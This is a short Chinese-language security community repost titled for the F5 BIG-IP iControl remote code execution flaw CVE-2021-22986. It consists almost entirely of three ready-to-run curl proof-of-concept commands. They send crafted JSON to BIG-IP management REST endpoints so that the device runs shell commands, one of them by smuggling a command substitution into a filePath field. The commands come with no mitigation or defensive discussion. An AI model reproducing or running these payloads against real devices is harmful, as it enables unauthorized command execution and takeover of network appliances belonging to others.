F5 BIG-IP iControl RCE (CVE-2021-22986)

Khan安全团队

发布于 2021-03-24 15:22:08

54700

代码可运行

文章被收录于专栏：Khan安全团队Khan安全团队

运行总次数：0

代码可运行

PoC #1

curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

PoC #2

curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'

PoC #3

curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2021-03-20，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度

F5 BIG-IP iControl RCE (CVE-2021-22986)

F5 BIG-IP iControl RCE (CVE-2021-22986)

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐